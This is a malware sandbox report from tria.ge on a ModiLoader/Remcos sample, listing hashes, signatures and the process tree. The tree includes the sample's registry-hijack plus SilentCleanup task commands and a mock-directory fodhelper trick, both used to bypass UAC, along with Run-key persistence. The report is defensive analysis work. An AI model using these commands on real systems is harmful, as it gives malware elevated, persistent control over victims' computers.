Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    08/07/2020, 10:06

General

  • Target

    de2ebb27023e08b71d091c7695c59192.exe

  • Size

    649KB

  • MD5

    de2ebb27023e08b71d091c7695c59192

  • SHA1

    6b5d2d11a1b712b38d6d699612cdd66fcc755db8

  • SHA256

    e67dd040ce53fbf4e0ef2121dabd060c5c764ede3eec55801376b144a0f40419

  • SHA512

    39c16d7f3672c6ee3c848e898a56b678bc7127ed1af0984a726a4557d8cd73ee96cdea1aa97f79e92680acfed7f666fd35e9f456acf15a54308cbc0eedc99071

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ServiceHost packer 123 IoCs

    Detects ServiceHost packer used for .NET malware

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 530 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\de2ebb27023e08b71d091c7695c59192.exe
    "C:\Users\Admin\AppData\Local\Temp\de2ebb27023e08b71d091c7695c59192.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3888
    • C:\Windows\SysWOW64\TapiUnattend.exe
      "C:\Windows\System32\TapiUnattend.exe"
      2⤵
        PID:3836
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
          3⤵
            PID:3864
            • C:\Windows\SysWOW64\reg.exe
              reg delete hkcu\Environment /v windir /f
              4⤵
              • Modifies registry key
              PID:856
            • C:\Windows\SysWOW64\reg.exe
              reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
              4⤵
              • Modifies registry key
              PID:3328
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
              4⤵
                PID:3104
              • C:\Windows\SysWOW64\reg.exe
                reg delete hkcu\Environment /v windir /f
                4⤵
                • Modifies registry key
                PID:2488
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\Users\Public\Runex.bat
              3⤵
                PID:2764
                • C:\Windows \System32\fodhelper.exe
                  "C:\Windows \System32\fodhelper.exe"
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:2960
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat
                    5⤵
                      PID:1196
              • C:\Program Files (x86)\internet explorer\ieinstal.exe
                "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                2⤵
                • Suspicious use of SetWindowsHookEx
                PID:3912

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/3888-130-0x0000000010530000-0x0000000010554000-memory.dmp

              Filesize

              144KB

            • memory/3888-124-0x0000000010410000-0x0000000010450000-memory.dmp

              Filesize

              256KB